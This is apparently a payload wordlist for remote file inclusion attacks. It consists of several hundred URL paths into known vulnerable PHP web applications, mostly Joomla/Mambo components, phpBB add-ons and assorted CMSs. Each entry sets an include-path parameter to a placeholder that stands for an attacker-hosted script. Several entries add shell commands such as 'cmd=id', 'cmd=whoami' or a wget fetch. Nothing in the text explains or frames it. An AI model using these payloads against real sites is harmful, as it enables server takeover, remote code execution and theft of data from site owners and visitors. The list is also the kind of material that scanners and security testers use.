/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
/administrator/menu_add.php?site_absolute_path=XXpathXX?
/administrator/menu_operation.php?site_absolute_path=XXpathXX?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb.inc.php?path=XXpathXX
/advanced_comment_system/admin.php?ACS_path=XXpathXX?
/advanced_comment_system/index.php?ACS_path=XXpathXX?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
/agenda.php3?rootagenda=XXpathXX
/agenda2.php3?rootagenda=XXpathXX
/aides/index.php?page=XXpathXX?
/ains_main.php?ains_path=XXpathXX
/ajax/loadsplash.php?full_path=XXpathXX
/ajouter.php?include=XXpathXX?
/akarru.gui/main_content.php?bm_content=XXpathXX
/akocomments.php?mosConfig_absolute_path=XXpathXX
/amazon/cart.php?cmd=add&asin=XXpathXX
/amazon/index.php?lang=XXpathXX
/amazon/info.php?asin=XXpathXX
/annonce.php?page=XXpathXX?&cmd=id
/announcements.php?phpraid_dir=XXpathXX
/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
/api.php?t_path_core=XXpathXX?&cmd=id
/apps/apps.php?app=XXpathXX
/appserv/main.php?appserv_root=XXpathXX
/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
/archive.php?scriptpath=XXpathXX?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
/artlist.php?root_path=XXpathXX
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/athena.php?athena_dir=XXpathXX
/auction/auction_common.php?phpbb_root_path=XXpathXX
/auction/includes/converter.inc.php?include_path=XXpathXX?
/auction/includes/messages.inc.php?include_path=XXpathXX?
/auction/includes/settings.inc.php?include_path=XXpathXX?
/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
/auth.cookie.inc.php?da_path=XXpathXX
/auth.header.inc.php?da_path=XXpathXX
/auth.sessions.inc.php?da_path=XXpathXX
/auth/auth.php?phpbb_root_path=XXpathXX
/auth/auth_phpbb/phpbb_root_path=XXpathXX
/authenticate.php?default_path_for_themes=XXpathXX?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
/autoindex.php?cfg_file=XXpathXX?
/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
/axoverzicht.cgi?maand=XXpathXX
/b2-tools/gm-2-b2.php?b2inc=XXpathXX
/b2verifauth.php?index=XXpathXX?
/backend/addons/links/index.php?PATH=XXpathXX
/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
/bb_admin.php?includeFooter=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
/bemarket/postscript/postscript.php?p_mode=XXpathXX
/biblioteca/bib_form.php?CLASSPATH=XXpathXX
/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
/biblioteca/bib_save.php?CLASSPATH=XXpathXX
/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
/biblioteca/edi_form.php?CLASSPATH=XXpathXX
/biblioteca/edi_save.php?CLASSPATH=XXpathXX
/biblioteca/gen_form.php?CLASSPATH=XXpathXX
/biblioteca/gen_save.php?CLASSPATH=XXpathXX
/biblioteca/lin_form.php?CLASSPATH=XXpathXX
/biblioteca/lin_save.php?CLASSPATH=XXpathXX
/biblioteca/luo_form.php?CLASSPATH=XXpathXX
/biblioteca/luo_save.php?CLASSPATH=XXpathXX
/biblioteca/sog_form.php?CLASSPATH=XXpathXX
/biblioteca/sog_save.php?CLASSPATH=XXpathXX
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
/bild.php?config[root_ordner]=XXpathXX?&cmd=id
/bin/qte_init.php?qte_root=XXpathXX?
/bingoserver.php3?response_dir=XXpathXX
/block.php?Include=XXpathXX
/blocks/birthday.php?full_path=XXpathXX
/blocks/events.php?full_path=XXpathXX
/blocks/help.php?full_path=XXpathXX
/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
/blogcms/index.php?DIR_PLUGINS=XXpathXX?
/board/post.php?qb_path=XXpathXX
/boitenews4/index.php?url_index=XXpathXX?
/books/allbooks.php?home=XXpathXX
/books/home.php?home=XXpathXX
/books/mybooks.php?home=XXpathXX
/bp_ncom.php?bnrep=XXpathXX
/bp_ncom.php?bnrep=XXpathXX?
/bp_news.php?bnrep=XXpathXX
/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
/bridge/yabbse.inc.php?sourcedir=XXpathXX
/bridges/SMF/logout.php?path_to_smf=XXpathXX
/bu/bu_cache.php?bu_dir=XXpathXX?
/bu/bu_claro.php?bu_dir=XXpathXX?
/bu/bu_parse.php?bu_dir=XXpathXX?
/bu/process.php?bu_dir=XXpathXX?
/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/builddb.php?env_dir=XXpathXX
/button/settings_sql.php?path=XXpathXX
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
/cal.func.php?dir_edge_lang=XXpathXX
/calcul-page.php?home=XXpathXX
/calendar.php?cfg_dir=XXpathXX?
/calendar.php?lang=XXpathXX
/calendar.php?path_to_calendar=XXpathXX
/calendar.php?vwar_root=XXpathXX?
/calendar/demo/index.php?date=&v=XXpathXX?
/calendar/payment.php?insPath=XXpathXX
/calendario/cal_insert.php?CLASSPATH=XXpathXX
/calendario/cal_save.php?CLASSPATH=XXpathXX
/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
/cart.php?lang_list=XXpathXX
/cart_content.php?cart_isp_root=XXpathXX
/catalogg/inludes/include_once.php?include_file=XXpathXX
/catalogshop.php?mosConfig_absolute_path=XXpathXX
/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
/cfagcms/themes/default/index.php?main=XXpathXX
/ch_readalso.php?read_xml_include=XXpathXX
/challenge.php?vwar_root=XXpathXX
/change_preferences2.php?target=XXpathXX?
/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/chat.php?my[root]=XXpathXX?cm=id
/chat/adminips.php?banned_file=XXpathXX
/chat/users_popupL.php3?From=XXpathXX
/checkout.php?abs_path=XXpathXX
/checkout.php?abs_path=XXpathXX?
/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
/circ.php?include_path=XXpathXX?
/circolari/cir_save.php?CLASSPATH=XXpathXX
/citywriter/head.php?path=XXpathXX?
/cl_files/index.php?path_to_calendar=XXpathXX?
/claroline/auth/ldap/authldap.php?includePath=XXpathXX
/claroline/phpbb/page_tail.php?includePath=XXpathXX
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
/class.mysql.php?path_to_bt_dir=XXpathXX
/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
/classes/Cache.class.php?rootdir=XXpathXX?
/classes/Customer.class.php?rootdir=XXpathXX?
/classes/Performance.class.php?rootdir=XXpathXX?
/classes/Project.class.php?rootdir=XXpathXX?
/classes/Representative.class.php?rootdir=XXpathXX?
/classes/User.class.php?rootdir=XXpathXX?
/classes/admin_o.php?absolutepath=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX?
/classes/board_o.php?absolutepath=XXpathXX
/classes/class_admin.php?PathToComment=XXpathXX?
/classes/class_comments.php?PathToComment=XXpathXX?
/classes/class_mail.inc.php?path_to_folder=XXpathXX
/classes/common.php?rootdir=XXpathXX?
/classes/core/language.php?rootdir=XXpathXX
/classes/dev_o.php?absolutepath=XXpathXX
/classes/file_o.php?absolutepath=XXpathXX
/classes/html/com_articles.php?absolute_path=XXpathXX
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
/classes/query.class.php?baseDir=XXpathXX
/classes/tech_o.php?absolutepath=XXpathXX
/classified.php?insPath=XXpathXX
/classified_right.php?language_dir=XXpathXX
/classifieds/index.php?lowerTemplate=XXpathXX
/clear.php?bibtexrootrel=XXpathXX?
/clearinfo.php?bibtexrootrel=XXpathXX?
/click.php?dir=XXpathXX?
/client.php?dir=XXpathXX
/client/faq_1/PageController.php?dir=XXpathXX
/clients/index.php?src=XXpathXX
/cls_fast_template.php?fname=XXpathXX
/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/modules.php?root_path=XXpathXX
/cms/modules/form.lib.php?sourceFolder=XXpathXX?
/cms/system/openengine.php?oe_classpath=XXpathXX???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
/cn_config.php?tpath=XXpathXX?
/coast/header.php?sections_file=XXpathXX?
/code/berylium-classes.php?beryliumroot=XXpathXX?
/code/display.php?admindir=XXpathXX?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/comments.php?AMG_serverpath=XXpathXX
/comments.php?scriptpath=XXpathXX?
/common.inc.php?CFG[libdir]=XXpathXX
/common.inc.php?CFG[libdir]=XXpathXX?
/common.inc.php?base_path=XXpathXX
/common.php?db_file=XXpathXX
/common.php?dir=XXpathXX
/common.php?ezt_root_path=XXpathXX?
/common.php?include_path=XXpathXX
/common.php?livealbum_dir=XXpathXX?
/common.php?locale=XXpathXX
/common.php?phpht_real_path=XXpathXX?
/common/db.php?commonpath=XXpathXX?
/common/func.php?CommonAbsD=XXpathXX?
/common/func.php?CommonAbsDir=XXpathXX
/community/Offline.php?sourcedir=XXpathXX?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
/components/calendar/com_calendar.php?absolute_path=XXpathXX?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
/components/com_articles.php?absolute_path=XXpathXX?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
/components/com_calendar.php?absolute_path=XXpathXX?
/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
/components/com_forum/download.php?phpbb_root_path=XXpathXX
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
/components/com_guestbook.php?absolute_path=XXpathXX?
/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
/components/com_minibb.php?absolute_path=XXpathXX
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
/components/core/connect.php?language_path=XXpathXX
/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
/components/minibb/index.php?absolute_path=XXpathXX?
/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/compteur/mapage.php?chemin=XXpathXX
/conf.php?securelib=XXpathXX
/conf.php?securelib=XXpathXX?
/config.inc.php3?rel_path=XXpathXX
/config.inc.php?_path=XXpathXX
/config.inc.php?path_escape=XXpathXX
/config.inc.php?path_escape=XXpathXX%00
/config.php?full_path=XXpathXX?
/config.php?full_path_to_db=XXpathXX
/config.php?fullpath=XXpathXX
/config.php?incpath=XXpathXX
/config.php?path_to_root=XXpathXX
/config.php?rel_path=XXpathXX?
/config.php?returnpath=XXpathXX
/config.php?sql_language=XXpathXX?
/config.php?xcart_dir=XXpathXX?
/config/config_admin.php?INC=XXpathXX?
/config/config_main.php?INC=XXpathXX?
/config/config_member.php?INC=XXpathXX?
/config/dbutil.bck.php?confdir=XXpathXX
/config/mysql_config.php?INC=XXpathXX?
/config/sender.php?ROOT_PATH=XXpathXX?
/configuration.php?absolute_path=XXpathXX?
/confirmUnsubscription.php?output=XXpathXX
/connect.php?path=XXpathXX
/connexion.php?DOCUMENT_ROOT=XXpathXX?
/contact.php?blog_theme=XXpathXX
/contacts.php?cal_dir=XXpathXX
/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
/content.php?content=XXpathXX
/content/admin.php?pwfile=XXpathXX
/content/content.php?fileloc=XXpathXX?
/content/delete.php?pwfile=XXpathXX
/content/modify.php?pwfile=XXpathXX
/content/modify_go.php?pwfile=XXpathXX
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
/controllers/MySQLController.php?baseDir=XXpathXX
/controllers/SQLController.php?baseDir=XXpathXX
/controllers/SetupController.php?baseDir=XXpathXX
/controllers/VideoController.php?baseDir=XXpathXX
/controllers/ViewController.php?baseDir=XXpathXX
/convert-date.php?cal_dir=XXpathXX
/convert/mvcw.php?step=1&vwar_root=XXpathXX
/convert/mvcw.php?vwar_root=XXpathXX
/core/admin/admin.php?p=admin&absoluteurlXXpathXX
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
/core/admin/categories_add.php?absoluteurlXXpathXX
/core/admin/categories_remove.php?absoluteurlXXpathXX
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
/core/admin/login.php?absoluteurlXXpathXX
/core/admin/pgRSSnews.php?absoluteurlXXpathXX
/core/admin/showcat.php?absoluteurlXXpathXX
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
/core/archive_cat.php?absoluteurlXXpathXX
/core/archive_nocat.php?absoluteurlXXpathXX
/core/aural.php?site_absolute_path=XXpathXX
/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
/core/editor.php?editor_insert_bottom=XXpathXX
/core/includes.php?CMS_ROOT=XXpathXX?
/core/recent_list.php?absoluteurlXXpathXX
/corpo.php?pagina=XXpathXX
/cp2.php?securelib=XXpathXX?
/cpe/index.php?repertoire_config=XXpathXX
/crea.php?plancia=XXpathXX
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
/creat_news_all.php?language=XXpathXX
/create_file.php?target=XXpathXX?
/cron.php?ROOT_PATH=XXpathXX
/cron.php?include_path=XXpathXX?
/crontab/run_billing.php?config[include_dir]=XXpathXX?
/cross.php?url=XXpathXX
/custom_vars.php?sys[path_addon]=XXpathXX
/customer/product.php?xcart_dir=XXpathXX
/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
/datei.php?config[root_ordner]=XXpathXX?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
/debugger.php?config_atkroot=XXpathXX
/decoder/gallery.php?ccms_library_path=XXpathXX
/decoder/markdown.php?ccms_library_path=XXpathXX
/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
/defines.php?WEBCHATPATH=XXpathXX?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
/depouilg.php3?NomVote=XXpathXX?
/development.php?root_prefix=XXpathXX?
/dfcode.php?DFORUM_PATH=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
/digitaleye_Path/module.php?menu=XXpathXX?
/dir/prepend.php?_PX_config[manager_path]=XXpathXX
/dir_thatware/config.php?root_path=XXpathXX'
/direct.php?rf=XXpathXX
/direction/index.php?repertoire_config=XXpathXX
/directory/index.php?path=XXpathXX
/display.php?pag=XXpathXX
/display.php?path=XXpathXX
/displayCategory.php?basepath=XXpathXX
/dix.php3?url_phpartenaire=XXpathXX
/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/doc/admin/index.php?ptinclude=XXpathXX
/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
/docs/front-end-demo/cart2.php?workdir=XXpathXX?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
/dosearch.php?RESPATH=XXpathXX
/download.php?root_prefix=XXpathXX?
/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
/downstat1.8/chart.php?art=XXpathXX?
/dp_logs.php?HomeDir=XXpathXX
/eXPerience2/modules.php?file=XXpathXX
/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=XXpathXX?
/editor.php?newsfile=XXpathXX
/editprofile.php?pathtohomedir=XXpathXX?
/editsite.php?returnpath=XXpathXX
/editx/add_address.php?include_dir=XXpathXX
/elseif/contenus.php?contenus=XXpathXX
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
/email_subscribe.php?root_prefix=XXpathXX?
/embed/day.php?path=XXpathXX
/enc/content.php?Home_Path=XXpathXX?
/engine/Ajax/editnews.php?root_dir=XXpathXX
/engine/api/api.class.php?dle_config_api=XXpathXX?
/engine/engine.inc.php?absolute_path=XXpathXX
/engine/init.php?root_dir=XXpathXX
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
/enth3/show_joined.php?path=XXpathXX
/environment.php?DIR_PREFIX=XXpathXX
/epal/index.php?view=XXpathXX?
/errors.php?error=XXpathXX
/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
/es_custom_menu.php?files_dir=XXpathXX
/es_desp.php?files_dir=XXpathXX
/es_offer.php?files_dir=XXpathXX
/eshow.php?Config_rootdir=XXpathXX
/esupport/admin/autoclose.php?subd=XXpathXX?
/eva/index.php3?aide=XXpathXX?
/eva/index.php3?perso=XXpathXX
/eva/index.php?eva[caminho]=XXpathXX
/event.php?myevent_path=XXpathXX
/event_cal/module/embed/day.php?path=XXpathXX
/eventcal2.php.php?path_simpnews=XXpathXX
/eventscroller.php?path_simpnews=XXpathXX
/example-view/templates/article.php?globals[content_dir]=XXpathXX?
/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
/example-view/templates/root.php?globals[content_dir]=XXpathXX?
/example.php?site=XXpathXX
/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
/examplefile.php?bibtexrootrel=XXpathXX?
/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
/extras/mt.php?web_root=XXpathXX
/extras/poll/poll.php?file_newsportal=XXpathXX
/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
/faq.php?module_root_path=XXpathXX
/faq.php?phpbb_root_path=XXpathXX
/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
/fcring.php?s_fuss=XXpathXX
/feed.php?config[root_ordner]=XXpathXX?&cmd=id
/feed/index2.php?m=XXpathXX
/files/amazon-bestsellers.php?CarpPath=XXpathXX
